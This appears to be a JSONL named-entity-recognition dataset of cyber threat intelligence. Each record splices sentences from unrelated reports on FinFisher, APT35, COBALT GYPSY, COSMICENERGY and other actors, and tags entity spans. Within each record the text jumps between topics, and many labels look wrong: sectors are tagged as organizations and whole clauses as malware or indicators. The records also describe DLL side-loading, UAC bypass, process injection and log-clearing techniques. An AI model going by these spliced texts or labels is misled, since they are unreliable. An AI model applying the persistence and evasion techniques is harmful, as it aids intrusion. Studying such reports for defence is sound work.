{"text": "We were a bit disappointed that we did not see traces of a true privilege escalation exploit after all this deobfuscation work , but it seems these FinFisher samples were designed to work just using UAC bypasses . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . After decoding the .png image , the loader then proceeds to initialize the key and IV used to perform AES decryption of the encrypted payload . This is expressed in the form of decimal digits .", "spans": [{"start": 64, "end": 92, "label": "Vulnerability"}, {"start": 148, "end": 157, "label": "Malware"}, {"start": 214, "end": 219, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 264, "end": 274, "label": "Organization"}, {"start": 277, "end": 282, "label": "Organization"}, {"start": 285, "end": 291, "label": "Organization"}, {"start": 294, "end": 305, "label": "Organization"}, {"start": 308, "end": 325, "label": "Organization"}, {"start": 330, "end": 356, "label": "Organization"}, {"start": 531, "end": 578, "label": "Indicator"}]}
{"text": "The setup code receives an installation command from the previous stage . APT35 has historically used unsophisticated tools like those listed below in Figure 3 . Both values are supplied from an array of 256 pseudo-random bytes hardcoded in the binary\u2019s .rdata section . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 74, "end": 79, "label": "Organization"}, {"start": 102, "end": 123, "label": "System"}]}
{"text": "In our test , this command was the value 3 . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors . The first two bytes of that array specify the relative offsets to the key and IV respectively . Furthermore , our analysis of the activity suggests Russia would be capable of developing similar capabilities against other SCADA systems and programming languages beyond MicroSCADA and SCIL .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 108, "end": 118, "label": "Organization"}, {"start": 123, "end": 143, "label": "Organization"}, {"start": 146, "end": 159, "label": "Organization"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 175, "end": 181, "label": "Organization"}, {"start": 186, "end": 209, "label": "Organization"}, {"start": 212, "end": 215, "label": "Organization"}, {"start": 224, "end": 235, "label": "Organization"}, {"start": 238, "end": 255, "label": "Organization"}, {"start": 260, "end": 286, "label": "Organization"}, {"start": 437, "end": 443, "label": "Organization"}, {"start": 510, "end": 523, "label": "System"}, {"start": 528, "end": 549, "label": "System"}, {"start": 557, "end": 567, "label": "System"}, {"start": 572, "end": 576, "label": "System"}]}
{"text": "The malware creates a global event named 0x0A7F1FFAB12BB2 and drops some files under a folder located in C : \\ProgramData or in the user application data folder . Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team . The loader uses the AES128 implementation from the open-source Crypto++2 library . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": [{"start": 41, "end": 57, "label": "Indicator"}, {"start": 105, "end": 121, "label": "Indicator"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 229, "end": 247, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 294, "end": 309, "label": "Organization"}, {"start": 375, "end": 392, "label": "System"}]}
{"text": "The name of the folder and the malware configuration are read from a customized configuration file stored in the resource section of the setup program . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . We were able to correlate most of the disassembly to the corresponding functions from the Crypto++ github source , and it doesn\u2019t appear that the malware authors have modified much of the original code . So far in 2023 , ransomware gangs hit the US , Germany , France , and the UK hard , with the US shouldering a hefty 43 % of all global attacks .", "spans": [{"start": 187, "end": 199, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 223, "end": 228, "label": "Organization"}, {"start": 301, "end": 308, "label": "Organization"}, {"start": 311, "end": 320, "label": "Organization"}, {"start": 325, "end": 352, "label": "Organization"}, {"start": 445, "end": 453, "label": "System"}, {"start": 576, "end": 592, "label": "Organization"}, {"start": 601, "end": 603, "label": "Organization"}, {"start": 606, "end": 613, "label": "Organization"}, {"start": 616, "end": 622, "label": "Organization"}, {"start": 629, "end": 632, "label": "Organization"}, {"start": 652, "end": 654, "label": "Organization"}]}
{"text": "Here the list of the files potentially dropped during the installation stage : FILE NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . A SimpleKeyringInterface class is used to initialize the key , while the IV is passed to the SetCipherWithIV function . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": [{"start": 107, "end": 115, "label": "Indicator"}, {"start": 224, "end": 233, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Indicator"}, {"start": 250, "end": 261, "label": "Indicator"}, {"start": 419, "end": 430, "label": "Indicator"}, {"start": 503, "end": 515, "label": "Organization"}, {"start": 516, "end": 523, "label": "Organization"}, {"start": 534, "end": 539, "label": "Organization"}, {"start": 612, "end": 619, "label": "Organization"}, {"start": 622, "end": 631, "label": "Organization"}, {"start": 636, "end": 663, "label": "Organization"}, {"start": 668, "end": 690, "label": "System"}, {"start": 759, "end": 774, "label": "System"}, {"start": 790, "end": 800, "label": "Organization"}, {"start": 864, "end": 868, "label": "Organization"}, {"start": 875, "end": 899, "label": "Organization"}, {"start": 925, "end": 933, "label": "Organization"}]}
{"text": "the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft Office process was used as exploit vector ) : Installation process under In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company . The decryption is performed with the use of the StreamTransformationFilter class with the StreamTransformation cipher set to AES CBC decryption mode . The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 4, "end": 16, "label": "Indicator"}, {"start": 20, "end": 32, "label": "Indicator"}, {"start": 124, "end": 133, "label": "Indicator"}, {"start": 275, "end": 287, "label": "Indicator"}, {"start": 498, "end": 514, "label": "System"}, {"start": 597, "end": 605, "label": "Organization"}, {"start": 641, "end": 646, "label": "Organization"}, {"start": 660, "end": 674, "label": "Organization"}, {"start": 725, "end": 751, "label": "System"}, {"start": 767, "end": 787, "label": "System"}, {"start": 848, "end": 853, "label": "Organization"}, {"start": 884, "end": 894, "label": "Organization"}]}
{"text": "UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run . The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . The library code performs numerous checks for the CPU features , and based on the outcome , it will choose a processor-specific implementation of the cryptographic function . The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP \u2019s primary capabilities and contains many developer - supplied comments for the included code .", "spans": [{"start": 70, "end": 78, "label": "Indicator"}, {"start": 115, "end": 150, "label": "Indicator"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 194, "end": 211, "label": "Malware"}, {"start": 786, "end": 851, "label": "Indicator"}]}
{"text": "The malware sets a registry value ( whose name is read from the configuration file ) to \u201c C : \\Windows\\system32\\rundll32.exe c : \\ProgramData\\AuditApp\\d3d9.dll , Control_Run \u201d . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the AES implementations makes use of the Intel AES-NI encryption instruction set which is supported by several modern Intel and AMD CPUs . By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": [{"start": 90, "end": 124, "label": "Indicator"}, {"start": 125, "end": 161, "label": "Indicator"}, {"start": 162, "end": 173, "label": "Indicator"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 213, "end": 228, "label": "System"}, {"start": 329, "end": 334, "label": "Organization"}, {"start": 335, "end": 341, "label": "System"}, {"start": 406, "end": 411, "label": "Organization"}, {"start": 416, "end": 419, "label": "Organization"}]}
{"text": "Before doing this , the malware makes a screenshot of the screen and displays it on top of all other windows for few seconds . They then proceeded to log directly into the VPN using the credentials of the compromised user . The decrypted payload undergoes one final transformation , where it is XORed with the first byte read from the C:\\Windows\\system . ini file , which is expected to begin with a comment character \" ; \" ( 0x3B ) . Curl An opensource commandline tool for transferring data using various network protocols .", "spans": [{"start": 101, "end": 108, "label": "System"}, {"start": 186, "end": 221, "label": "System"}, {"start": 435, "end": 439, "label": "System"}]}
{"text": "This indicates that the authors are trying to hide some messages showed by the system during the setup process . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure . Performing the same steps in CyberChef , it is possible to decode the encrypted payload , which should yield x86 shellcode , starting with a call immediate opcode sequence . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": [{"start": 138, "end": 154, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 239, "end": 248, "label": "System"}]}
{"text": "When loaded with startup command 2 , the installer can copy the original explorer.exe file inside its current running directory and rename d3d9.dll to uxtheme.dll . Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance . Varies : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 73, "end": 90, "label": "Indicator"}, {"start": 139, "end": 147, "label": "Indicator"}, {"start": 151, "end": 162, "label": "Indicator"}, {"start": 193, "end": 198, "label": "Organization"}, {"start": 371, "end": 377, "label": "Malware"}, {"start": 400, "end": 405, "label": "Organization"}, {"start": 436, "end": 446, "label": "Organization"}]}
{"text": "In this case the persistence is achieved by loading the original explorer.exe from its startup location and , using DLL side-loading , passing the execution control to the stage 4 malware ( discussed in next section ) . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East . 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Malware/Backdoor 658 KB ( 674 , 304 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": [{"start": 65, "end": 77, "label": "Indicator"}, {"start": 348, "end": 412, "label": "Indicator"}, {"start": 480, "end": 487, "label": "System"}, {"start": 490, "end": 493, "label": "System"}, {"start": 508, "end": 513, "label": "Organization"}, {"start": 544, "end": 556, "label": "Malware"}, {"start": 645, "end": 661, "label": "Organization"}]}
{"text": "Finally , the malware spawns a thread that has the goal to load , remap , and relocate the stage 5 malware . Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 . While this loader differs somewhat in general implementation , the payload extraction routine seems to be the same as in the previous variant . In this incident , the attacker leveraged an EOL version of the MicroSCADA supervisory control system .", "spans": [{"start": 109, "end": 117, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 235, "end": 240, "label": "Organization"}, {"start": 432, "end": 435, "label": "System"}, {"start": 451, "end": 461, "label": "System"}]}
{"text": "In this context , there is indeed no need to execute the stage 4 malware . The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) . The main differences are : The social media platform says it tied the groups malware samples to a specific Iranianbased IT contractor called Mahak Rayan Afraz , which has previously provided malware to the IRGC , indicating a link between the Tortoiseshell group and the Iranian government .", "spans": [{"start": 99, "end": 106, "label": "System"}, {"start": 139, "end": 159, "label": "System"}, {"start": 162, "end": 165, "label": "System"}, {"start": 201, "end": 222, "label": "Organization"}, {"start": 231, "end": 303, "label": "Malware"}, {"start": 311, "end": 328, "label": "Organization"}, {"start": 361, "end": 368, "label": "Malware"}, {"start": 376, "end": 380, "label": "Organization"}, {"start": 413, "end": 426, "label": "Organization"}, {"start": 441, "end": 459, "label": "Organization"}]}
{"text": "The msvcr90.dll file is opened , read , and decrypted , and the code execution control is transferred to the RunDll exported routine . Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . The way the decryption routine is called ( from within the DllMain function , as opposed to an exported function ) . KillNet has also repeatedly promoted messaging related to changes or expansions in the collective \u2019s operations , ranging from KillNet reforming to become a \u201c private military hacker company \u201d to purported partnerships with cyber crime groups .", "spans": [{"start": 4, "end": 20, "label": "Indicator"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 203, "end": 223, "label": "Organization"}, {"start": 389, "end": 396, "label": "System"}, {"start": 574, "end": 581, "label": "Organization"}]}
{"text": "In the case of 32-bit systems , the malware may attempt a known UAC bypass by launching printui.exe system process and using token manipulation with NtFilterToken as described in this blog post . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . The way the payload is invoked ( by overwriting the return address on the stack , as opposed to a direct call ) . The Talos Threat Spotlight posts and Quarterly Trends reports provide details of threats and the techniques used by threat actors .", "spans": [{"start": 88, "end": 99, "label": "Indicator"}, {"start": 196, "end": 199, "label": "Organization"}, {"start": 346, "end": 358, "label": "Organization"}, {"start": 374, "end": 381, "label": "Organization"}, {"start": 502, "end": 507, "label": "Organization"}]}
{"text": "Installation process with administrative privilege This installation method is more interesting because it reveals how the malware tries to achieve stealthier persistence on the machine . Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . Implementation of an additional anti-analysis check that compares the name of the parent process to a string stored in an encrypted resource . The opportunities for governments and law enforcement to use spyware as part of legal investigations led to the development of commercial spyware .", "spans": [{"start": 252, "end": 264, "label": "Organization"}, {"start": 298, "end": 309, "label": "Malware"}, {"start": 314, "end": 344, "label": "Malware"}, {"start": 512, "end": 523, "label": "Organization"}, {"start": 528, "end": 543, "label": "Organization"}, {"start": 617, "end": 635, "label": "System"}]}
{"text": "The method is a well-known trick used by penetration testers that was automated and generalized by FinFisher The procedure starts by enumerating the KnownDlls object directory and then scanning for section objects of the cached system DLLs . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . We came across multiple variations of this DLL containing different parent process names , possibly targeted specifically to the victim\u2019s environment . then the data decoded with Base64 and sent to C2 server IP using POST request to the subdirectory .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 242, "end": 254, "label": "Organization"}, {"start": 288, "end": 306, "label": "Organization"}, {"start": 309, "end": 319, "label": "Organization"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 332, "end": 335, "label": "Organization"}, {"start": 342, "end": 374, "label": "Organization"}, {"start": 433, "end": 451, "label": "Organization"}, {"start": 460, "end": 472, "label": "Organization"}, {"start": 524, "end": 527, "label": "System"}, {"start": 638, "end": 675, "label": "Malware"}, {"start": 679, "end": 691, "label": "System"}, {"start": 698, "end": 710, "label": "System"}]}
{"text": "Next , the malware enumerates all .exe programs in the % System % folder and looks for an original signed Windows binary that imports from at least one KnownDll and from a library that is not in the KnownDll directory . The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 . Some of these names include processes related to security software : Ashley Madison \u2019s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison \u2019s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": [{"start": 106, "end": 113, "label": "System"}, {"start": 280, "end": 292, "label": "Organization"}, {"start": 426, "end": 440, "label": "Organization"}, {"start": 578, "end": 592, "label": "Organization"}, {"start": 637, "end": 671, "label": "System"}, {"start": 714, "end": 729, "label": "Organization"}]}
{"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations . wsc_proxy.exe plugins-setup.exe SoftManager.exe GetEFA.exe . Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": [{"start": 113, "end": 129, "label": "Indicator"}, {"start": 184, "end": 187, "label": "Organization"}, {"start": 270, "end": 283, "label": "Indicator"}, {"start": 284, "end": 301, "label": "Indicator"}, {"start": 302, "end": 317, "label": "Indicator"}, {"start": 318, "end": 328, "label": "Indicator"}, {"start": 331, "end": 338, "label": "Malware"}]}
{"text": "At this point the malware extracts and decrypts a stub DLL from its own resources ( ID 101 ) . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . Features : Do you have cyber security concerns about your business Contact CoreTech today , and we will conduct an IT security assessment .", "spans": [{"start": 111, "end": 129, "label": "System"}, {"start": 148, "end": 193, "label": "Malware"}, {"start": 198, "end": 205, "label": "System"}, {"start": 210, "end": 247, "label": "System"}, {"start": 355, "end": 363, "label": "Organization"}]}
{"text": "It then calls a routine that adds a code section to a target module . The survey contained macros that , once enabled , downloaded PupyRAT . Side-loaded DLL Anti-debugging/anti-sandboxing check for parent process name . Why does this matter Because nation states are well funded and super determined .", "spans": [{"start": 131, "end": 138, "label": "System"}, {"start": 153, "end": 156, "label": "System"}, {"start": 249, "end": 262, "label": "Organization"}]}
{"text": "This section will contain a fake export table mimicking the same export table of the original system DLL chosen . CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns . Loads next-stage payload using custom .png steganography . Further analysis of COSMICENERGY is available as part of .", "spans": [{"start": 114, "end": 117, "label": "Organization"}, {"start": 150, "end": 162, "label": "Organization"}, {"start": 163, "end": 175, "label": "Organization"}, {"start": 315, "end": 340, "label": "System"}, {"start": 363, "end": 375, "label": "Malware"}]}
{"text": "At the time of writing , the dropper supports aepic.dll , sspisrv.dll , ftllib.dll , and userenv.dll to host the malicious FinFisher payload . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents . Uses AES128 implementation from Crypto++ library for payload decryption . We were able to find additional links between Hack520 \u2019s \u201c Pig network \u201d and the Winnti group \u2019s activities .", "spans": [{"start": 46, "end": 55, "label": "Indicator"}, {"start": 58, "end": 69, "label": "Indicator"}, {"start": 72, "end": 82, "label": "Indicator"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 123, "end": 132, "label": "Malware"}, {"start": 179, "end": 191, "label": "Organization"}, {"start": 222, "end": 231, "label": "Organization"}, {"start": 333, "end": 349, "label": "System"}, {"start": 421, "end": 428, "label": "Organization"}, {"start": 434, "end": 445, "label": "System"}, {"start": 456, "end": 468, "label": "Organization"}]}
{"text": "Finally , a new Windows service is created with the service path pointing to the candidate .exe located in this new directory together with the freshly created , benign-looking DLL . The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . Executes the payload by overwriting the return address on the stack . The dropper first creates a shortcut file but the dropped DLL is launched with rundll32.exe instead of regsvr32.exe .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 372, "end": 376, "label": "System"}, {"start": 385, "end": 392, "label": "System"}, {"start": 530, "end": 556, "label": "Indicator"}, {"start": 557, "end": 580, "label": "Indicator"}]}
{"text": "In this way , when the service runs during boot , the original Windows executable is executed from a different location and it will automatically load and map the malicious DLL inside its address space , instead of using the genuine system library . By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives . Known to load an updated version of Remy backdoor . For operational plans development , the combination of threats , vulnerabilities , and impacts must be evaluated in order to identify important trends and decide where effort should be applied to eliminate or reduce threat capabilities eliminate or reduce vulnerabilities and assess , coordinate , and deconflict all cyberspace operations NIST , 2010 .", "spans": [{"start": 63, "end": 70, "label": "System"}, {"start": 446, "end": 459, "label": "Malware"}]}
{"text": "This routine is a form of generic and variable generator of DLL side-loading combinations . These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona . This DLL does not contain an export table and its entire functionality resides in the DllMain routine . \u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 127, "end": 139, "label": "Organization"}, {"start": 217, "end": 224, "label": "Organization"}, {"start": 240, "end": 243, "label": "System"}, {"start": 321, "end": 328, "label": "System"}, {"start": 360, "end": 376, "label": "Vulnerability"}, {"start": 381, "end": 397, "label": "Vulnerability"}, {"start": 447, "end": 473, "label": "System"}]}
{"text": "Figure 10 . CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations . Upon execution , the malware will first decrypt a string from its resources and compare it against the name of the parent process . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": [{"start": 12, "end": 15, "label": "Organization"}, {"start": 124, "end": 129, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 395, "end": 432, "label": "Malware"}, {"start": 478, "end": 493, "label": "Malware"}, {"start": 509, "end": 527, "label": "System"}]}
{"text": "Windows Defender ATP timeline can pinpoint the service DLL side-loading trick ( in this example , using fltlib.dll ) . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets . If the names differ , the malware will simply exit without touching the payload . If you receive such an email , just delete it and do n\u2019t give it a second thought .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 104, "end": 114, "label": "Indicator"}, {"start": 134, "end": 141, "label": "System"}, {"start": 199, "end": 212, "label": "Organization"}]}
{"text": "In the past , we have seen other activity groups like LEAD employ a similar attacker technique named \u201c proxy-library \u201d to achieve persistence , but not with this professionalism . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . The resource containing the expected process name ( ICON/1 ) is XORed with the first byte of the legitimate C:\\Windows\\system.ini file \u2013 0x3B ( \" ; \" ) . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": [{"start": 180, "end": 183, "label": "Organization"}, {"start": 210, "end": 222, "label": "Organization"}, {"start": 305, "end": 323, "label": "Organization"}, {"start": 434, "end": 455, "label": "Indicator"}, {"start": 514, "end": 717, "label": "Organization"}]}
{"text": "The said technique brings the advantage of avoiding auto-start extensibility points ( ASEP ) scanners and programs that checks for binaries installed as service ( for the latter , the service chosen by FinFisher will show up as a clean Windows signed binary ) . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . If the parent name matches , the malware will traverse the stack in order to find a return address that falls into the memory of the parent process\u2019s text section . A Systemd service unit allows for a program to be run under certain conditions , and in this case , it was used to execute the GOGETTER binary on reboot .", "spans": [{"start": 202, "end": 211, "label": "Malware"}, {"start": 236, "end": 243, "label": "System"}, {"start": 284, "end": 296, "label": "Organization"}, {"start": 347, "end": 359, "label": "Organization"}, {"start": 709, "end": 734, "label": "Malware"}]}
{"text": "The malware cleans the system event logs using OpenEventLog/ClearEventLog APIs , and then terminates the setup procedure with a call to StartService to run the stage 4 malware . COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . Next , the payload is read from the .png cover file , which seems to have been taken from an inspirational quotes website3 . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 178, "end": 190, "label": "Organization"}, {"start": 204, "end": 216, "label": "Organization"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 430, "end": 443, "label": "System"}, {"start": 482, "end": 507, "label": "System"}]}
{"text": "Figure 11 . SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 . In this instance , the payload is fully contained within the image\u2019s pixel color codes , leaving no remaining data beyond the IEND marker . DOUBLEDRAG attempts to download a second - stage obfuscated PowerShell memory - only dropper , which Mandiant tracks as DOUBLEDROP , that will launch a backdoor into memory .", "spans": [{"start": 12, "end": 43, "label": "Organization"}, {"start": 46, "end": 49, "label": "Organization"}, {"start": 124, "end": 136, "label": "Organization"}, {"start": 301, "end": 311, "label": "System"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 421, "end": 431, "label": "System"}]}
{"text": "The DLL side-loaded stage 4 malware mimicking a real export table to avoid detection Stage 4 : The memory loader \u2013 Fun injection with GDI function hijacking Depending on how stage 4 was launched , two different things may happen : In the low-integrity case ( under UAC ) the installer simply injects the stage 5 malware into the bogus explorer.exe process started earlier and terminates In the high-integrity case ( with administrative privileges or after UAC bypass ) , the code searches for the process hosting the Plug and Play service ( usually svchost.exe SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 . Finally , the loader will decrypt the payload to a memory buffer and overwrite the previously found return address with the pointer to that buffer , ensuring that the malicious shellcode will be executed when the DLL attempts to return to the caller . Examples of indicators of attack , and why they matter", "spans": [{"start": 335, "end": 347, "label": "Indicator"}, {"start": 549, "end": 560, "label": "Indicator"}, {"start": 561, "end": 594, "label": "Organization"}, {"start": 597, "end": 600, "label": "Organization"}, {"start": 675, "end": 687, "label": "Organization"}, {"start": 925, "end": 928, "label": "System"}, {"start": 976, "end": 996, "label": "Indicator"}]}
{"text": ") loaded in memory and injects itself into it For the second scenario , the injection process works like this : The malware opens the target service process . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) . The loader embedded in the payload seems to be a variant of the Veil \" shellcode_inject \" payload , previously used by OceanLotus to load older versions of Remy backdoor . the malware uses and to get the function Address .", "spans": [{"start": 159, "end": 162, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 279, "end": 291, "label": "Organization"}, {"start": 292, "end": 304, "label": "Organization"}, {"start": 324, "end": 341, "label": "Organization"}, {"start": 410, "end": 414, "label": "System"}, {"start": 417, "end": 433, "label": "System"}, {"start": 465, "end": 475, "label": "Organization"}, {"start": 502, "end": 515, "label": "Malware"}, {"start": 518, "end": 529, "label": "Malware"}]}
{"text": "It allocates and fills four chunks of memory inside the service process . Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns . In this instance , the shellcode is configured to load an encoded backdoor from within the payload . OT asset owners leveraging IEC-104 compliant devices should take action to preempt potential in the wild deployment of COSMICENERGY .", "spans": [{"start": 96, "end": 110, "label": "Organization"}, {"start": 361, "end": 376, "label": "Organization"}, {"start": 388, "end": 413, "label": "System"}, {"start": 480, "end": 492, "label": "Malware"}]}
{"text": "One chunk contains the entire malware DLL code ( without PE headers ) . This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 . The final payload comes in a form of a launcher DLL that contains an encrypted backdoor in its .rdata section and a plain-text configuration in its resources . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": [{"start": 77, "end": 98, "label": "Organization"}, {"start": 112, "end": 125, "label": "Organization"}, {"start": 268, "end": 271, "label": "System"}, {"start": 380, "end": 389, "label": "Organization"}]}
{"text": "Another chunk is used to copy a basic Ntdll and Kernel32 import address table . Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States . The resources also store one or more C2 communication modules . There is another important point we stole a fairly large amount of sensitive data from your local network financial documents personal information of your employees , customers , partners work documentation , postal correspondence and much more .", "spans": [{"start": 108, "end": 139, "label": "System"}, {"start": 384, "end": 386, "label": "System"}]}
{"text": "Two chunks are filled with an asynchronous procedure call ( APC ) routine code and a stub . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . The backdoor DLL and the C2 communication DLLs are heavily obfuscated using high quantities of junk code , which significantly inflates their size and makes both static analysis and debugging more difficult . Wind farms in central Europe and internet users were also affected .", "spans": [{"start": 166, "end": 179, "label": "Organization"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 228, "end": 241, "label": "Organization"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 313, "end": 323, "label": "Organization"}, {"start": 404, "end": 407, "label": "System"}, {"start": 416, "end": 418, "label": "System"}, {"start": 600, "end": 610, "label": "Organization"}, {"start": 614, "end": 628, "label": "Organization"}, {"start": 633, "end": 647, "label": "Organization"}]}
